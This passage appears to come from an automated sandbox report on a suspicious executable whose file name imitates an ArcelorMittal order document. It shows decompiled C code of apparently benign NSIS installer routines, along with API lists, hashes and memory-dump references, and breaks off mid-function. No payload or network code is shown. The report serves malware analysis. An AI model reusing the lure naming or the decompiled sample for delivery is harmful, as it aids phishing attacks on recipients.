                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
                                                • Instruction ID: b0c4edec147008cd01dbb3001b95c609c297ceb5d42f7dfd9ff58b90d4b754cd
                                                • Opcode Fuzzy Hash: 744784328c674175fcbcfcf0e9bbf26443557e854759898e5afcc3989039e9af
                                                • Instruction Fuzzy Hash: D2F0F472500504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007E10D3 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 28stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E007E10D3(WCHAR* _a4, intOrPtr _a8, short* _a12, int _a16) {
				int _t11;
				short* _t12;

				_t12 = _a12;
				_t11 = 0;
				 *_t12 = 0;
				if(lstrlenA(_a4) != _a8) {
					lstrcpyW(_t12, _a4);
				} else {
					MultiByteToWideChar(0, 0, _a4, 0xffffffff, _t12, _a16);
					_t11 = 1;
				}
				return _t11;
			}





                                                0x007e10d7
                                                0x007e10db
                                                0x007e10e0
                                                0x007e10ec
                                                0x007e1106
                                                0x007e10ee
                                                0x007e10f9
                                                0x007e10ff
                                                0x007e10ff
                                                0x007e1111

                                                APIs
                                                • lstrlenA.KERNEL32(?,740976928,740976928,?,007E1514,740976928,?,740976928,00000400), ref: 007E10E3
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000400,?,?,007E1514,740976928,?,740976928,00000400), ref: 007E10F9
                                                • lstrcpyW.KERNEL32 ref: 007E1106
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrcpylstrlen
                                                • String ID: 740976928$740976928
                                                • API String ID: 133274523-4290860111
                                                • Opcode ID: d663db363392e9607009793b4f3a56bb93599529aa83a40e7b56a59a985f4abd
                                                • Instruction ID: 3ed16c53e46084c296ef61552af4d9cbfa2604b4ca01221930d1e886cd450547
                                                • Opcode Fuzzy Hash: d663db363392e9607009793b4f3a56bb93599529aa83a40e7b56a59a985f4abd
                                                • Instruction Fuzzy Hash: D4E06D36101058BB8F125F46DC48CDF3F3EFF8A3727508014FA18961A0CB359952DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040494D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E0040494D(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406054(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406054(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406054(_t44, _t50, 0x7a1f40, 0x7a1f40, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f40) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a18, _a4, 0x7a1f40);
			}



















                                                0x00404956
                                                0x0040495b
                                                0x00404963
                                                0x00404964
                                                0x00404971
                                                0x00404979
                                                0x0040497a
                                                0x0040497c
                                                0x0040497e
                                                0x00404980
                                                0x00404983
                                                0x00404983
                                                0x0040498a
                                                0x00404990
                                                0x00404990
                                                0x00404997
                                                0x0040499e
                                                0x004049a1
                                                0x004049a4
                                                0x004049a4
                                                0x004049a8
                                                0x004049b8
                                                0x004049ba
                                                0x004049bd
                                                0x00404966
                                                0x00404966
                                                0x0040496d
                                                0x0040496d
                                                0x004049c5
                                                0x004049d0
                                                0x004049e6
                                                0x004049f7
                                                0x00404a13

                                                APIs
                                                • lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049EE
                                                • wsprintfW.USER32 ref: 004049F7
                                                • SetDlgItemTextW.USER32 ref: 00404A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
                                                • Instruction ID: b64f68613590d753eae0667b1f9c1485f74a5586c4fdc6504f9435c9407cab2f
                                                • Opcode Fuzzy Hash: ce9979b4b01424170f7f3781fe10c2b71c9da1ea9fb3152acdeb899b4a45e53b
                                                • Instruction Fuzzy Hash: EC11D87360412827EB10A66D9C41EDF329C9B82334F150237FA65F21D1EA78C82682E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405AEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E00405AEE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406032(0x7a4748, _a4);
				_t21 = E00405A91(0x7a4748);
				if(_t21 != 0) {
					E004062C6(_t21);
					if(( *0x7a8a58 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4748 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4748);
							_push(0x7a4748);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406375();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405A32(0x7a4748);
								continue;
							} else {
								goto L1;
							}
						}
						E004059E6();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                0x00405afa
                                                0x00405b05
                                                0x00405b09
                                                0x00405b10
                                                0x00405b1c
                                                0x00405b2c
                                                0x00405b2e
                                                0x00405b46
                                                0x00405b47
                                                0x00405b4e
                                                0x00405b4f
                                                0x00000000
                                                0x00000000
                                                0x00405b32
                                                0x00405b39
                                                0x00405b41
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405b39
                                                0x00405b51
                                                0x00000000
                                                0x00405b65
                                                0x00405b1e
                                                0x00405b24
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405b24
                                                0x00405b0b
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                  • Part of subcall function 00405A91: CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,0040A300,00405B05,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405AA4
                                                  • Part of subcall function 00405A91: CharNextW.USER32(00000000), ref: 00405ABC
                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405B47
                                                • GetFileAttributesW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\), ref: 00405B57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 3248276644-2759061382
                                                • Opcode ID: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
                                                • Instruction ID: 3bddcdf43bb23baaa909825d7db9bcd58a82d3117edc1a0c43d32c447e9df16d
                                                • Opcode Fuzzy Hash: 1c109e48d901a23ea14b6098b96b6ff6b364b8c8cfe64631121789c2790142ee
                                                • Instruction Fuzzy Hash: F4F0F429104D6216C232723A1C49AAF3564CF92364B1A063FBC51B12C1DF3CBD42CCAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405A91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405A91(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405A13(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}









                                                0x00405a9a
                                                0x00405aa1
                                                0x00405aa4
                                                0x00405aa6
                                                0x00405aac
                                                0x00405ac4
                                                0x00405ae6
                                                0x00000000
                                                0x00405acc
                                                0x00405ace
                                                0x00405acf
                                                0x00405ad2
                                                0x00405ad3
                                                0x00405adc
                                                0x00000000
                                                0x00000000
                                                0x00405adf
                                                0x00405ae2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ae2
                                                0x00000000
                                                0x00405acf
                                                0x00405abb
                                                0x00000000
                                                0x00405abc

                                                APIs
                                                • CharNextW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,0040A300,00405B05,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,772EFAA0,?,C:\Users\user~1\AppData\Local\Temp\,00405843,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"), ref: 00405A9F
                                                • CharNextW.USER32(00000000), ref: 00405AA4
                                                • CharNextW.USER32(00000000), ref: 00405ABC
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp, xrefs: 00405A92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharNext
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 3213498283-1732896309
                                                • Opcode ID: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
                                                • Instruction ID: 0cb906ce55498ce86d0db88686860b14f8f146b66f9f6c0e4bde91ccc4fe9cfd
                                                • Opcode Fuzzy Hash: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
                                                • Instruction Fuzzy Hash: E2F09611B10F1195DF3176545CC5A7B6AB8EB94354B04863BD602B72C0D7B84D818F99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004059E6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E004059E6(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                0x004059e7
                                                0x004059f4
                                                0x004059f5
                                                0x00405a00
                                                0x00405a08
                                                0x00405a08
                                                0x00405a10

                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,0040326A,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 004059EC
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,0040326A,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 004059F6
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405A08
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004059E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 2659869361-2382934351
                                                • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                • Instruction ID: ee04230c76b470484a65779322a078522fef8bc0a4cae86812832761b4080375
                                                • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                • Instruction Fuzzy Hash: 30D0A7711019306AC121EB449C04DDF629CAF45300341443FF501B30A2C77C5D618BFE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402D8A(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7976f8; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a4c;
						if(_t2 >  *0x7a8a4c) {
							_t3 = CreateDialogParamW( *0x7a8a40, 0x6f, 0, E00402D04, 0);
							 *0x7976f8 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406444(0);
					}
				} else {
					_t6 =  *0x7976f8; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7976f8 = 0;
					return _t6;
				}
			}






                                                0x00402d91
                                                0x00402dab
                                                0x00402db1
                                                0x00402dbb
                                                0x00402dc1
                                                0x00402dc7
                                                0x00402dd8
                                                0x00402de1
                                                0x00000000
                                                0x00402de6
                                                0x00402ded
                                                0x00402db3
                                                0x00402dba
                                                0x00402dba
                                                0x00402d93
                                                0x00402d93
                                                0x00402d9a
                                                0x00402d9d
                                                0x00402d9d
                                                0x00402da3
                                                0x00402daa
                                                0x00402daa

                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403517,?), ref: 00402D9D
                                                • GetTickCount.KERNEL32 ref: 00402DBB
                                                • CreateDialogParamW.USER32 ref: 00402DD8
                                                • ShowWindow.USER32(00000000,00000005,?,?,00000000,00403517,?), ref: 00402DE6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
                                                • Instruction ID: 43aedd9bd01b98b6f78ee00b952d30abd1abf30aba01f835b52ba634ff97d244
                                                • Opcode Fuzzy Hash: 1b6a587a400701eabc8229d3e3b69e73e671933e3945777b2463f190b987498e
                                                • Instruction Fuzzy Hash: 1AF05E30516A22EBC6916B14FF4DE8B7B64AB80B1171684BBF051B11E4CA7C0C82CB9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403B51 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403B51(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = L"1033";
				_t13 = 0xffff;
				_t6 = E00405F92(__ecx, L"1033");
				while(1) {
					_t26 =  *0x7a8a84;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x7a8a50 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x7a8a80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x7a7a20 = _t18[1];
					 *0x7a8ae8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x7a7a1c = _t23;
						E00405F79(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextW( *0x7a1f20, E00406054(_t13, _t24, _t26, "Overcaustically Setup", 0xfffffffe));
						_t11 =  *0x7a8a6c;
						_t27 =  *0x7a8a68;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
